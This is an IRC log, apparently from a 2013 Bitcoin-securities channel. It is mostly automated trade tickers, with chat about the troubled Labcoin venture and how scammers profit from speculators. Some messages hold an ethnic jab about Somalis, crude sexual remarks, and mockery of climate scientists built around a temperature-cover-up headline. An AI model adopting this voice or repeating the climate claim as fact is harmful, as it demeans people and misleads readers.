[BTCTC] [TAT.NEOBEE] 164 @ 0.002999 = 0.4918 BTC [-] Sep 20 23:37:08 21:57.07 ( mircea_popescu ) kakobrekla : "or for that matter, someone doing 1 gh/s could solve each block from now on until the next olympic games. not too likely, but possible.". also subjective ? :D [21:55:23] Sep 20 23:37:09 no Sep 20 23:37:16 well it says likely. Sep 20 23:38:18 [BTCTC] [ACTIVEMINING] 8353 @ 0.00160426 = 13.4004 BTC [-] {8} Sep 20 23:42:43 yeah but you are describing a mathematical probability Sep 20 23:42:52 rite? Sep 20 23:43:23 [HAVELOCK] [HIM] 51 @ 0.18999 = 9.6895 BTC [-] Sep 20 23:44:18 ya well... Sep 20 23:44:27 i claim it's just as unlikely! ha! Sep 20 23:46:51 :p Sep 20 23:48:28 [BTCTC] [ASICMINER-PT] 1 @ 1.737 BTC [+] Sep 20 23:48:50 https://www.lordofultima.com/en/ref/EgvYxC0YOVad95NXXgYLkA if anyone feels like trying out a browser game. Sep 20 23:48:57 Enter Your Email - Lord of Ultima - Official EA Free To Play Site Sep 20 23:49:38 ive played that one Sep 20 23:49:40 its not bad Sep 20 23:51:56 seems okay ya Sep 20 23:52:33 [BTCTC] [ASICMINER-PT] 29 @ 1.74310344 = 50.55 BTC [+] {4} Sep 20 23:55:36 [HAVELOCK] [NEOBEE] 5400 @ 0.003 = 16.2 BTC [-] {2} Sep 20 23:57:38 [HAVELOCK] [NEOBEE] 1100 @ 0.003 = 3.3 BTC [-] Sep 21 00:04:45 [BTCTC] [TAT.ASICMINER] 40 @ 0.01674 = 0.6696 BTC [+] Sep 21 00:04:45 [HAVELOCK] [NEOBEE] 900 @ 0.003 = 2.7 BTC [-] Sep 21 00:05:45 [BTCTC] [TAT.NEOBEE] 120 @ 0.002999 = 0.3599 BTC [-] {2} Sep 21 00:06:46 [BTCTC] [ASICMINER-PT] 3 @ 2 = 6 BTC [+] Sep 21 00:08:48 [MPEX] [S.MPOE] 3742 @ 0.00093285 = 3.4907 BTC [+] Sep 21 00:08:48 [BTCTC] [LABCOIN] 6500 @ 0.00175466 = 11.4053 BTC [+] {5} Sep 21 00:13:53 [BTCTC] [TAT.NEOBEE] 50 @ 0.002999 = 0.15 BTC [-] Sep 21 00:14:54 [BTCTC] [TAT.ASICMINER] 10 @ 0.01674 = 0.1674 BTC [+] {2} Sep 21 00:16:40 |*|UPDATTED|*| < maybe the Solarwind guy should fix the huge red a blue bolded typo Sep 21 00:17:14 maybe he prefers that spelling Sep 21 00:17:57 [BTCTC] [CRYPTO-TRADE] 5 @ 0.1975 = 0.9875 BTC [+] Sep 21 00:18:24 it's sorta more symmetrical... Sep 21 00:22:01 [BTCTC] [TAT.NEOBEE] 350 @ 0.002999 = 1.0497 BTC [-] Sep 21 00:23:19 well, it looks like a race to zero for icedrill vs actimining on Bitfunder Sep 21 00:23:52 activemining Sep 21 00:30:10 [BTCTC] [LABCOIN] 90 @ 0.00166005 = 0.1494 BTC [-] {2} Sep 21 00:32:11 [BTCTC] [COGNITIVE] 1 @ 0.136 BTC [-] Sep 21 00:33:12 [BTCTC] [BASIC-MINING] 1 @ 0.1095 BTC [-] Sep 21 00:34:51 to the core! Sep 21 00:38:14 the fall enslaves us all Sep 21 00:38:36 gotta be careful icemining with a drill Sep 21 00:40:19 [BTCTC] [ACTIVEMINING] 150 @ 0.00150905 = 0.2264 BTC [-] {2} Sep 21 00:42:21 [HAVELOCK] [NEOBEE] 1666 @ 0.003 = 4.998 BTC [-] Sep 21 00:42:22 [BTCTC] [BASIC-MINING] 1 @ 0.1243 BTC [+] Sep 21 00:43:22 [BTCTC] [COGNITIVE] 1 @ 0.1683 BTC [+] Sep 21 00:43:22 [HAVELOCK] [NEOBEE] 43 @ 0.003 = 0.129 BTC [-] {2} Sep 21 00:43:23 [HAVELOCK] [CFIG] 3 @ 0.10333333 = 0.31 BTC [-] {2} Sep 21 00:44:23 [HAVELOCK] [CFIG] 3 @ 0.1 = 0.3 BTC [-] Sep 21 00:45:24 [HAVELOCK] [NEOBEE] 200 @ 0.003 = 0.6 BTC [-] Sep 21 00:45:25 [BTCTC] [TAT.ASICMINER] 10 @ 0.01674 = 0.1674 BTC [+] Sep 21 00:48:27 [BTCTC] [TAT.ASICMINER] 6 @ 0.01675666 = 0.1005 BTC [+] {2} Sep 21 00:52:32 [HAVELOCK] [NEOBEE] 480 @ 0.003 = 1.44 BTC [-] {2} Sep 21 00:54:33 [HAVELOCK] [NEOBEE] 49 @ 0.003 = 0.147 BTC [-] Sep 21 00:57:36 [BTCTC] [ACTIVEMINING] 272 @ 0.00151169 = 0.4112 BTC [-] {3} Sep 21 00:58:38 [HAVELOCK] [NEOBEE] 1667 @ 0.003 = 5.001 BTC [-] Sep 21 01:03:43 [BTCTC] [LABCOIN] 650 @ 0.001755 = 1.1408 BTC [+] {3} Sep 21 01:04:44 [BTCTC] [ACTIVEMINING] 100 @ 0.001509 = 0.1509 BTC [-] Sep 21 01:05:45 [BTCTC] [LABCOIN] 5005 @ 0.00175899 = 8.8037 BTC [+] {2} Sep 21 01:06:46 [BTCTC] [TAT.NEOBEE] 775 @ 0.002995 = 2.3211 BTC [-] Sep 21 01:08:48 [BTCTC] [TAT.NEOBEE] 180 @ 0.002999 = 0.5398 BTC [+] Sep 21 01:09:49 [BTCTC] [LABCOIN] 1000 @ 0.001759 = 1.759 BTC [+] Sep 21 01:13:52 [BTCTC] [FN] [DMS.SELLING] 150 @ 0.00719176 = 1.0788 BTC [-] {3} Sep 21 01:14:53 [HAVELOCK] [NEOBEE] 1300 @ 0.003 = 3.9 BTC [-] Sep 21 01:15:54 [BTCTC] [TAT.NEOBEE] 2000 @ 0.002999 = 5.998 BTC [+] {3} Sep 21 01:16:55 [HAVELOCK] [NEOBEE] 52 @ 0.003 = 0.156 BTC [-] Sep 21 01:18:57 [BTCTC] [BTC-BOND] 214 @ 0.0100107 = 2.1423 BTC [-] {3} Sep 21 01:19:58 [BTCTC] [TAT.NEOBEE] 2000 @ 0.00299988 = 5.9998 BTC [+] {2} Sep 21 01:20:59 [BTCTC] [TAT.NEOBEE] 2350 @ 0.003 = 7.05 BTC [+] Sep 21 01:20:59 [BTCTC] [BTC-BOND] 50 @ 0.009993 = 0.4997 BTC [-] Sep 21 01:22:00 [BTCTC] [BTC-BOND] 30 @ 0.009992 = 0.2998 BTC [-] Sep 21 01:23:01 [BTCTC] [BTC-BOND] 150 @ 0.00999 = 1.4985 BTC [-] {2} Sep 21 01:26:04 [BTCTC] [LTC-ATF.B2] 48 @ 0.01099 = 0.5275 BTC [+] Sep 21 01:28:06 [BTCTC] [LABCOIN] 1209 @ 0.0016 = 1.9344 BTC [-] {3} Sep 21 01:28:06 [BTCTC] [ASICMINER-PT] 2 @ 1.83 = 3.66 BTC [-] Sep 21 01:29:07 [BTCTC] [LABCOIN] 17649 @ 0.00176274 = 31.1106 BTC [+] {17} Sep 21 01:31:09 [BTCTC] [TAT.NEOBEE] 500 @ 0.002999 = 1.4995 BTC [-] Sep 21 01:32:10 [BTCTC] [TAT.ASICMINER] 29 @ 0.01674 = 0.4855 BTC [-] Sep 21 01:43:21 [HAVELOCK] [NEOBEE] 1000 @ 0.003 = 3 BTC [-] Sep 21 01:44:22 [BTCTC] [KENILWORTH] 60 @ 0.00172 = 0.1032 BTC [+] Sep 21 01:45:23 [BTCTC] [LABCOIN] 2656 @ 0.00153285 = 4.0712 BTC [-] {6} Sep 21 01:46:24 [BTCTC] [ACTIVEMINING] 995 @ 0.0016 = 1.592 BTC [-] Sep 21 01:46:24 [BTCTC] [LABCOIN] 6010 @ 0.00140481 = 8.4429 BTC [-] {3} Sep 21 01:47:25 [BTCTC] [LABCOIN] 6000 @ 0.00137077 = 8.2246 BTC [-] {6} Sep 21 01:48:26 [BTCTC] [DMS.MINING] 126 @ 0.00197461 = 0.2488 BTC [-] {2} Sep 21 01:48:26 [BTCTC] [LABCOIN] 3399 @ 0.00136844 = 4.6513 BTC [-] {4} Sep 21 01:52:31 [BTCTC] [CRYPTO-TRADE] 30 @ 0.19695666 = 5.9087 BTC [-] {3} Sep 21 01:55:33 [BTCTC] [FN] [BTC-GROWTH] 2 @ 0.09612 = 0.1922 BTC [-] Sep 21 01:55:33 [BTCTC] [TAT.NEOBEE] 500 @ 0.002999 = 1.4995 BTC [-] Sep 21 01:57:35 [HAVELOCK] [NEOBEE] 50 @ 0.003 = 0.15 BTC [-] Sep 21 02:00:38 [BTCTC] [LABCOIN] 100 @ 0.00149891 = 0.1499 BTC [+] {3} Sep 21 02:01:39 [HAVELOCK] [AM100] 15 @ 0.01621001 = 0.2432 BTC [-] Sep 21 02:02:40 [HAVELOCK] [NEOBEE] 970 @ 0.003 = 2.91 BTC [-] Sep 21 02:02:41 [BTCTC] [DMS.MINING] 133 @ 0.00190813 = 0.2538 BTC [-] {5} Sep 21 02:03:41 [HAVELOCK] [NEOBEE] 212 @ 0.003 = 0.636 BTC [-] Sep 21 02:05:43 [BTCTC] [FN] [DMS.SELLING] 21 @ 0.00695466 = 0.146 BTC [-] {2} Sep 21 02:05:44 [BTCTC] [ASICMINER-PT] 3 @ 1.85 = 5.55 BTC [+] Sep 21 02:06:44 [BTCTC] [TAT.NEOBEE] 1997 @ 0.002999 = 5.989 BTC [-] Sep 21 02:08:46 [BTCTC] [ASICMINER-PT] 2 @ 1.83 = 3.66 BTC [-] Sep 21 02:08:47 [BTCTC] [TAT.NEOBEE] 3215 @ 0.003 = 9.645 BTC [+] Sep 21 02:09:47 [BTCTC] [TAT.NEOBEE] 8743 @ 0.003 = 26.229 BTC [+] Sep 21 02:09:48 [HAVELOCK] [AM100] 60 @ 0.01615336 = 0.9692 BTC [-] {5} Sep 21 02:10:49 [HAVELOCK] [AM100] 30 @ 0.016 = 0.48 BTC [-] {2} Sep 21 02:11:50 [HAVELOCK] [NEOBEE] 484 @ 0.003 = 1.452 BTC [-] Sep 21 02:11:51 [BTCTC] [ASICMINER-PT] 3 @ 1.83 = 5.49 BTC [-] Sep 21 02:13:31 hi Sep 21 02:13:42 hi Sep 21 02:13:52 [BTCTC] [ASICMINER-PT] 5 @ 1.80939999 = 9.047 BTC [-] {4} Sep 21 02:14:01 hi Sep 21 02:14:09 lol hi assbot Sep 21 02:14:14 what up kakobrekla Sep 21 02:14:29 ah long day, too fucking long Sep 21 02:14:53 [BTCTC] [TAT.NEOBEE] 3209 @ 0.002999 = 9.6238 BTC [-] Sep 21 02:15:02 you, panaman? Sep 21 02:16:55 [BTCTC] [LABCOIN] 800 @ 0.001499 = 1.1992 BTC [+] Sep 21 02:16:55 [HAVELOCK] [CBTC] 33166 @ 0.00041609 = 13.8 BTC [+] {7} Sep 21 02:16:56 [BTCTC] [TAT.NEOBEE] 7291 @ 0.002999 = 21.8657 BTC [-] Sep 21 02:17:55 [HAVELOCK] [CBTC] 10000 @ 0.00032902 = 3.2902 BTC [-] {6} Sep 21 02:17:56 [BTCTC] [ASICMINER-PT] 10 @ 1.95 = 19.5 BTC [+] Sep 21 02:18:56 [BTCTC] [ASICMINER-PT] 8 @ 1.82287498 = 14.583 BTC [-] {5} Sep 21 02:19:04 well ill be going, stupid fuckin white men. Sep 21 02:19:18 and dont get all sassy, its not an insult, its a cultural reference Sep 21 02:19:57 [BTCTC] [LABCOIN] 24190 @ 0.0016494 = 39.899 BTC [+] {13} Sep 21 02:19:57 [BTCTC] [TAT.NEOBEE] 6458 @ 0.003 = 19.374 BTC [+] Sep 21 02:20:39 lol somalians getting uppity Sep 21 02:20:53 uppity is tortilla Sep 21 02:26:40 "I know I'm in no place to judge strategies right now but that's just how I see it." ~Fund Manager Sep 21 02:28:05 [HAVELOCK] [NEOBEE] 1500 @ 0.003 = 4.5 BTC [-] Sep 21 02:28:08 I wonder if Labcoin will survive to have a longer thread than AM Sep 21 02:29:15 only like 20 pages to go Sep 21 02:32:31 strageties ? Sep 21 02:36:13 [HAVELOCK] [AM100] 800 @ 0.01520268 = 12.1621 BTC [-] {7} Sep 21 02:36:14 [BTCTC] [TAT.NEOBEE] 330 @ 0.003 = 0.99 BTC [+] Sep 21 02:36:14 [BTCTC] [ASICMINER-PT] 4 @ 2 = 8 BTC [+] Sep 21 02:37:14 [BTCTC] [KENILWORTH] 131 @ 0.00172 = 0.2253 BTC [+] Sep 21 02:37:14 [BTCTC] [ASICMINER-PT] 19 @ 1.92573684 = 36.589 BTC [-] {5} Sep 21 02:38:15 [BTCTC] [ASICMINER-PT] 3 @ 1.95433333 = 5.863 BTC [+] {2} Sep 21 02:38:15 [BTCTC] [TAT.ASICMINER] 16 @ 0.01676 = 0.2682 BTC [+] Sep 21 02:40:27 basically someone told him his take on some things is bad Sep 21 02:40:36 it's funnt Sep 21 02:40:39 sec Sep 21 02:41:23 https://bitcointalk.org/index.php?topic=222565.msg3197514#msg3197514 Sep 21 02:41:28 SANDSTORM: - A Collective Investment Vehicle for BTC. - Sep 21 02:41:34 "To be completely honest, things are not looking great for Sandstorm right now. " Sep 21 02:42:18 lol Sep 21 02:43:23 xaviar did a good job of making that painfully clear to everyone a couple weeks ago Sep 21 02:49:26 [BTCTC] [LABCOIN] 2500 @ 0.001699 = 4.2475 BTC [-] Sep 21 02:49:26 [BTCTC] [BTC-TRADING-PT] 4 @ 0.89 = 3.56 BTC [+] Sep 21 02:51:03 and to be incompletely honest, great company! Sep 21 02:51:28 [BTCTC] [FN] [DMS.SELLING] 93 @ 0.007192 = 0.6689 BTC [+] Sep 21 02:51:49 liquidates rental starter, buys more labcoin Sep 21 02:51:51 face Sep 21 02:51:53 palm Sep 21 02:56:33 [BTCTC] [LABCOIN] 805 @ 0.00150881 = 1.2146 BTC [-] {3} Sep 21 02:57:34 [BTCTC] [TAT.NEOBEE] 320 @ 0.003 = 0.96 BTC [+] Sep 21 02:58:35 [BTCTC] [LABCOIN] 2005 @ 0.00174899 = 3.5067 BTC [+] {2} Sep 21 02:59:36 [BTCTC] [LABCOIN] 6465 @ 0.001749 = 11.3073 BTC [+] {2} Sep 21 03:00:37 [BTCTC] [LABCOIN] 1530 @ 0.001749 = 2.676 BTC [+] Sep 21 03:01:38 [BTCTC] [LABCOIN] 100 @ 0.00177 = 0.177 BTC [+] Sep 21 03:01:38 [BTCTC] [ACTIVEMINING] 516 @ 0.0016763 = 0.865 BTC [+] {4} Sep 21 03:01:38 [BTCTC] [ASICMINER-PT] 4 @ 1.83 = 7.32 BTC [-] Sep 21 03:14:51 [HAVELOCK] [NEOBEE] 132 @ 0.003 = 0.396 BTC [-] {2} Sep 21 03:21:58 [BTCTC] [TAT.ASICMINER] 30 @ 0.01676 = 0.5028 BTC [+] Sep 21 03:21:59 [BTCTC] [FN] [BTC-GROWTH] 50 @ 0.09594299 = 4.7971 BTC [-] {5} Sep 21 03:22:58 [BTCTC] [TAT.NEOBEE] 200 @ 0.003 = 0.6 BTC [+] Sep 21 03:25:00 [BTCTC] [TAT.ASICMINER] 10 @ 0.01727 = 0.1727 BTC [+] Sep 21 03:26:01 [BTCTC] [CB.IDIFF-E] 5 @ 0.0244 = 0.122 BTC [+] Sep 21 03:30:06 [HAVELOCK] [NEOBEE] 1350 @ 0.003 = 4.05 BTC [-] Sep 21 03:31:06 [HAVELOCK] [AM100] 15 @ 0.01599333 = 0.2399 BTC [+] {2} Sep 21 03:32:08 [HAVELOCK] [NEOBEE] 175 @ 0.003 = 0.525 BTC [-] Sep 21 03:35:11 [HAVELOCK] [AM100] 10 @ 0.016 = 0.16 BTC [+] Sep 21 03:35:12 [BTCTC] [TAT.NEOBEE] 500 @ 0.003 = 1.5 BTC [+] Sep 21 03:37:13 [BTCTC] [CIPHERMINE-PT] 2 @ 0.05485 = 0.1097 BTC [-] Sep 21 03:37:28 http://www.reddit.com/r/Bitcoin/comments/1ms4zl/atlantis_online_drug_black_market_shuts_its_doors/cccdzpw Sep 21 03:38:06 ;;seen mod6 Sep 21 03:38:06 mod6 was last seen in #bitcoin-assets 1 day, 0 hours, 2 minutes, and 29 seconds ago: haha Sep 21 03:42:18 [BTCTC] [TAT.NEOBEE] 2500 @ 0.003 = 7.5 BTC [+] Sep 21 03:44:20 [BTCTC] [DMS.MINING] 182 @ 0.001905 = 0.3467 BTC [-] Sep 21 03:49:25 [BTCTC] [FN] [DMS.SELLING] 682 @ 0.007192 = 4.9049 BTC [+] Sep 21 03:51:27 [BTCTC] [FN] [DMS.SELLING] 150 @ 0.007193 = 1.079 BTC [+] Sep 21 03:54:30 [HAVELOCK] [NEOBEE] 401 @ 0.003 = 1.203 BTC [-] Sep 21 03:54:31 [BTCTC] [TAT.NEOBEE] 100 @ 0.003 = 0.3 BTC [+] Sep 21 03:59:35 [BTCTC] [ASICMINER-PT] 2 @ 1.803 = 3.606 BTC [-] Sep 21 04:00:36 [BTCTC] [TAT.NEOBEE] 5000 @ 0.003 = 15 BTC [+] Sep 21 04:01:37 [BTCTC] [TAT.NEOBEE] 2800 @ 0.003 = 8.4 BTC [+] Sep 21 04:04:40 [BTCTC] [TAT.NEOBEE] 35 @ 0.003 = 0.105 BTC [+] Sep 21 04:09:45 [BTCTC] [TAT.NEOBEE] 2165 @ 0.003 = 6.495 BTC [+] {2} Sep 21 04:12:48 [BTCTC] [ASICMINER-PT] 5 @ 1.8026 = 9.013 BTC [-] {3} Sep 21 04:15:51 [BTCTC] [TAT.NEOBEE] 50 @ 0.003 = 0.15 BTC [+] Sep 21 04:16:52 [BTCTC] [TAT.ASICMINER] 50 @ 0.01666258 = 0.8331 BTC [-] {5} Sep 21 04:17:53 [BTCTC] [TAT.NEOBEE] 1800 @ 0.003 = 5.4 BTC [+] Sep 21 04:29:04 [BTCTC] [TAT.NEOBEE] 300 @ 0.003 = 0.9 BTC [+] Sep 21 04:35:10 [BTCTC] [LABCOIN] 605 @ 0.001559 = 0.9432 BTC [-] {2} Sep 21 04:36:11 [BTCTC] [LABCOIN] 1395 @ 0.001559 = 2.1748 BTC [-] {2} Sep 21 04:41:16 [BTCTC] [LABCOIN] 1000 @ 0.00155329 = 1.5533 BTC [-] {5} Sep 21 04:41:16 [BTCTC] [TAT.NEOBEE] 150 @ 0.003 = 0.45 BTC [+] Sep 21 04:45:23 http://www.dailymail.co.uk/news/article-2425775/Climate-scientists-told-cover-fact-Earths-temperature-risen-15-years.html Sep 21 04:45:26 Climate scientists told to 'cover up' the fact that the Earth's temperature hasn't risen for the las Sep 21 04:48:46 without reading, just looking at the pictures -> "oh wow, ipcc again" Sep 21 04:48:47 mircea_popescu: doesn't matter if someone leaks a video of all the AGW folks fucking goats while laughing at the gullible public Sep 21 04:49:02 why not ? it amuses me. Sep 21 04:49:03 the chumpatron will keep going without skipping a beat Sep 21 04:49:12 which happens to be the point of the entire exercise, after all. Sep 21 04:49:24 [BTCTC] [ACTIVEMINING] 980 @ 0.001724 = 1.6895 BTC [-] Sep 21 04:52:24 its sort of like the steam-powered automatic doors in ancient egyptian temples Sep 21 04:52:44 go ahead and tell the worshippers that the heat from the sacrificial bowl warms the water, etc. Sep 21 04:52:55 just get clubbed for your troubles Sep 21 04:55:29 [BTCTC] [ASICMINER-PT] 1 @ 1.802 BTC [-] Sep 21 04:56:02 well ehre's the thing : if the worshippers are irrational they're statistically as likely to blow you as they are to clobber you (by definition) Sep 21 04:56:07 if they're rational then there you go. Sep 21 04:56:28 trick is that they're already blowing this other fellow Sep 21 04:56:30 [BTCTC] [TAT.ASICMINER] 45 @ 0.01718 = 0.7731 BTC [+] Sep 21 04:56:35 mircea_popescu: https://bitcointalk.org/index.php?topic=263445.msg3201864#msg3201864 Sep 21 04:56:41 I may be out of line. Sep 21 04:56:46 their mouths are full already Sep 21 04:57:33 you actually still have labcoin ? Sep 21 04:57:38 i guess you get to sue burnside nao. Sep 21 04:58:13 somebody kindly clue me in, why was this labcoin crapola newsworthy to begin with? Sep 21 04:58:32 [BTCTC] [LABCOIN] 4000 @ 0.00152902 = 6.1161 BTC [-] {8} Sep 21 05:00:11 also humor. Sep 21 05:00:45 they were supposed to bring a bunch of hash online using their own proprietary chips, they botched it. that coupled with the epic incompetence of their pr it's all gone to shit Sep 21 05:01:29 so much so that it being an outright scam is a very real concern Sep 21 05:01:41 Duffer1: i suppose the usual idiots bought in? not much of a chumpatron w/out the chumps Sep 21 05:01:56 mircea_popescu: yeah, i bought some for amusement at ipo Sep 21 05:02:06 but, is my point off basis? Sep 21 05:02:08 with the amount of coin involved it was a bunch of us that bought in Sep 21 05:02:25 Duffer1 sokay, you read trilema next time yes ? Sep 21 05:02:36 paywalled :( Sep 21 05:02:37 Ukyo it can certainly be argued. Sep 21 05:02:49 Duffer1 "with the amount of coin involved"... Sep 21 05:03:22 7000 at ipo and much more has traded hands since then Sep 21 05:03:32 do i understand correctly, the algo here: 1) peddle an outrageous crock of shit 2) people buy in 'for the lulz' 3) profit! Sep 21 05:03:37 [HAVELOCK] [B] [XBOND] 960 @ 0.001375 = 1.32 BTC [-] Sep 21 05:03:56 it wasn't outrageous at ipo Sep 21 05:04:37 130nm at ipo with theseven consulting on their 65nm design Sep 21 05:04:38 [HAVELOCK] [B] [XBOND] 248 @ 0.00138383 = 0.3432 BTC [+] {2} Sep 21 05:04:42 Duffer1: how not? you give some random fellow btc, he proceeds to do ???, you take his word for it Sep 21 05:04:56 asciilifeform well it's a little more complex. some people buy for the lulz, which is exactly the same process that sunk patrick harnett way back when : have someone with a small but definite investment that takes you to court and kills you. Sep 21 05:05:02 it was my 500 btc then, for instance. Sep 21 05:05:24 some other people buy because they daytrade, that's what they do. these punish the hell out of the scammer by extracting btc from his shit. Sep 21 05:05:31 finally some muppets buy because they're idiots. Sep 21 05:05:39 [HAVELOCK] [B] [XBOND] 2035 @ 0.0013998 = 2.8486 BTC [+] Sep 21 05:05:42 or gamblers Sep 21 05:05:54 a good 90% of the "volume" is the scammer trading with himself. the remainder 10% is distributed among the 1-2-3 types. Sep 21 05:06:12 if type 2 is large enough the scammer ends getting a negative net before being mauled to shit by 1. Sep 21 05:06:23 ukyo you're not wrong man, but pr dodging the exchange operator couldn't be a bigger red flag Sep 21 05:06:31 if type 3 is large enough we get a runaway reaction which is bad. Sep 21 05:06:42 agreed, but i should have been pesented that way Sep 21 05:06:45 it* Sep 21 05:06:53 ya i agree Sep 21 05:06:53 Duffer1 the correct way to handle this was, of course, displayed long ago by mpex. Sep 21 05:06:57 it could have made it worse. but at least it would have been factual. Sep 21 05:07:11 http://trilema.com/2013/sbvps-delisting-notice/ Sep 21 05:07:14 S.BVPS delisting notice pe Trilema - Un blog de Mircea Popescu. Sep 21 05:07:18 ukyo: you're post is great, but wouldn't the btct thread be much more fitting? Sep 21 05:07:34 well, these folks want trust without the reputation of an affair like mpex. so, cryptocontracts (shitcoin, or something more state-of-the-art) Sep 21 05:07:52 why does anyone trust them without a mathematical poison pill of some form ? Sep 21 05:07:55 mp burnside's confirmed they 85% of shares controlled by the principle labcoin account haven't moved, the activity we're seeing is legit trading Sep 21 05:08:01 This was just to make my opinion as an investor to other inestors for consideration Sep 21 05:08:38 Duffer1 burnside is in cya mode atm. i don't evaluate what he says from a different perspective. Sep 21 05:08:40 If i posted that in btct's thread, it would have defenitely been an attack, and not to get a shared consensus from other investors Sep 21 05:08:42 [BTCTC] [LABCOIN] 1000 @ 0.00169079 = 1.6908 BTC [+] {5} Sep 21 05:08:52 hehehe Sep 21 05:09:22 asciilifeform "anyone". why does anyone trust the ipcc ? Sep 21 05:09:22 i think backing up addresses with issuers is a reasonable precaution Sep 21 05:12:00 mircea_popescu: i'm just a bit befuddled at the success of the btc chumpatrons Sep 21 05:12:15 im pretty sure the labcoin one is in the red. Sep 21 05:12:17 no success. Sep 21 05:13:02 mircea_popescu: it succeeded in getting attention and pounding the signal-to-noise ratio of various places into the floor Sep 21 05:13:21 what, the forum ? Sep 21 05:13:27 the forum didn't have signal before that. Sep 21 05:13:29 this channel, for one Sep 21 05:13:44 i don't think so. great opportunity for new people to learn shit. Sep 21 05:13:57 even when a scammer fails to steal a net positive sum, he steals 'brain cycles', no? Sep 21 05:14:09 brain cycles should be stolen. is how education works. Sep 21 05:14:39 mircea_popescu: i presume you still use spam filters, no? despite the educational value of some 419s Sep 21 05:15:50 [HAVELOCK] [NEOBEE] 1293 @ 0.003 = 3.879 BTC [-] Sep 21 05:15:51 [HAVELOCK] [AM100] 4241 @ 0.01520003 = 64.4633 BTC [-] {4} Sep 21 05:16:51 [BTCTC] [TAT.ASICMINER] 15 @ 0.01697 = 0.2546 BTC [-] Sep 21 05:16:51 [BTCTC] [BMF] 45 @ 0.03199843 = 1.4399 BTC [-] {4} Sep 21 05:17:52 [HAVELOCK] [NEOBEE] 100 @ 0.003 = 0.3 BTC [-] Sep 21 05:18:03 partially on topic: http://youtu.be/4K6FXe5XcHs Sep 21 05:22:57 [HAVELOCK] [AM100] 13 @ 0.01619 = 0.2105 BTC [+] {2} Sep 21 05:23:58 [BTCTC] [LABCOIN] 2520 @ 0.00152025 = 3.831 BTC [-] {3} Sep 21 05:26:00 [HAVELOCK] [CBTC] 5000 @ 0.00043956 = 2.1978 BTC [+] {4} Sep 21 05:30:04 [BTCTC] [ACTIVEMINING] 1290 @ 0.00178656 = 2.3047 BTC [+] {5} Sep 21 05:34:08 [BTCTC] [TAT.NEOBEE] 21100 @ 0.003 = 63.3 BTC [+] Sep 21 05:44:44 "Xcoind backend failure at 1966" ~BTCT Sep 21 05:51:32 same error on trading api Sep 21 05:53:44 i guess we've been christcoined Sep 21 05:54:15 up again Sep 21 05:54:28 [BTCTC] [TAT.NEOBEE] 3900 @ 0.003 = 11.7 BTC [+] Sep 21 05:55:29 [BTCTC] [TAT.NEOBEE] 670 @ 0.003 = 2.01 BTC [+] Sep 21 05:56:14 thx Sep 21 05:58:32 [BTCTC] [TAT.ASICMINER] 375 @ 0.01621256 = 6.0797 BTC [-] {12} Sep 21 06:02:36 [BTCTC] [TAT.NEOBEE] 1500 @ 0.003 = 4.5 BTC [+] Sep 21 06:04:38 [BTCTC] [TAT.NEOBEE] 4110 @ 0.003 = 12.33 BTC [+] Sep 21 06:05:39 [BTCTC] [LABCOIN] 100 @ 0.001572 = 0.1572 BTC [+] Sep 21 06:12:46 [BTCTC] [DMS.MINING] 500 @ 0.00190705 = 0.9535 BTC [+] {2} Sep 21 06:12:46 [BTCTC] [FN] [DMS.SELLING] 500 @ 0.00718775 = 3.5939 BTC [-] {2} Sep 21 06:26:59 [BTCTC] [ASICMINER-PT] 4 @ 1.8 = 7.2 BTC [-] Sep 21 06:28:00 [HAVELOCK] [NEOBEE] 500 @ 0.003 = 1.5 BTC [-] Sep 21 06:29:01 [BTCTC] [TAT.NEOBEE] 100 @ 0.003 = 0.3 BTC [+] Sep 21 06:30:02 [BTCTC] [TAT.ASICMINER] 7 @ 0.01622 = 0.1135 BTC [+] Sep 21 06:41:13 [BTCTC] [CB.IDIFF-E] 6 @ 0.0244 = 0.1464 BTC [+] Sep 21 06:41:13 [BTCTC] [TAT.NEOBEE] 3333 @ 0.003 = 9.999 BTC [+] Sep 21 06:49:21 [BTCTC] [TAT.ASICMINER] 22 @ 0.01622045 = 0.3568 BTC [+] {2} Sep 21 06:50:22 [BTCTC] [TAT.ASICMINER] 13 @ 0.0162 = 0.2106 BTC [-] Sep 21 06:51:23 [BTCTC] [TAT.NEOBEE] 235 @ 0.003 = 0.705 BTC [+] **** BEGIN LOGGING AT Sat Sep 21 11:09:47 2013 Sep 21 11:11:41 [BTCTC] [FN] [BTC-GROWTH] 10 @ 0.09869 = 0.9869 BTC [+] Sep 21 11:14:44 [BTCTC] [TAT.NEOBEE] 5330 @ 0.003 = 15.99 BTC [+] Sep 21 11:15:45 [BTCTC] [DMS.MINING] 200 @ 0.00190391 = 0.3808 BTC [-] {5} Sep 21 11:15:45 [BTCTC] [TAT.NEOBEE] 150 @ 0.003 = 0.45 BTC [+] Sep 21 11:17:46 [BTCTC] [TAT.NEOBEE] 3288 @ 0.003 = 9.864 BTC [+] Sep 21 11:18:47 [BTCTC] [TAT.NEOBEE] 40 @ 0.003 = 0.12 BTC [+] {2} Sep 21 11:25:54 [BTCTC] [TAT.NEOBEE] 6592 @ 0.003 = 19.776 BTC [+] Sep 21 11:28:57 [BTCTC] [LABCOIN] 505 @ 0.0016 = 0.808 BTC [-] {2} Sep 21 11:32:00 [HAVELOCK] [NEOBEE] 1830 @ 0.003 = 5.49 BTC [-] Sep 21 11:32:02 [BTCTC] [LABCOIN] 99 @ 0.0016 = 0.1584 BTC [-] Sep 21 11:36:04 [BTCTC] [LABCOIN] 1500 @ 0.001534 = 2.301 BTC [-] {3} Sep 21 11:37:05 [BTCTC] [LABCOIN] 1000 @ 0.001534 = 1.534 BTC [-] Sep 21 11:39:09 [BTCTC] [LABCOIN] 878 @ 0.001534 = 1.3469 BTC [-] Sep 21 11:39:09 [MPEX] [S.MPOE] 8800 @ 0.00093338 = 8.2137 BTC [+] {2} Sep 21 12:16:45 [BTCTC] [LABCOIN] 443 @ 0.001599 = 0.7084 BTC [-] Sep 21 12:16:45 [BTCTC] [TAT.NEOBEE] 600 @ 0.003 = 1.8 BTC [+] Sep 21 12:17:46 [BTCTC] [LABCOIN] 200 @ 0.00159897 = 0.3198 BTC [-] {2} Sep 21 12:19:48 [BTCTC] [ASICMINER-PT] 20 @ 1.70039999 = 34.008 BTC [-] {5} Sep 21 12:27:56 [BTCTC] [ASICMINER-PT] 1 @ 1.701 BTC [+] Sep 21 12:37:05 [BTCTC] [TAT.NEOBEE] 3000 @ 0.003 = 9 BTC [+] Sep 21 12:40:52 https://bitcointalk.org/index.php?topic=298787.0 very interesting. especially 3) for me Sep 21 12:40:57 My guidelines for Investment/Involvement Sep 21 12:40:59 I wonder how you can provide that kind of evidence - "surveys"? 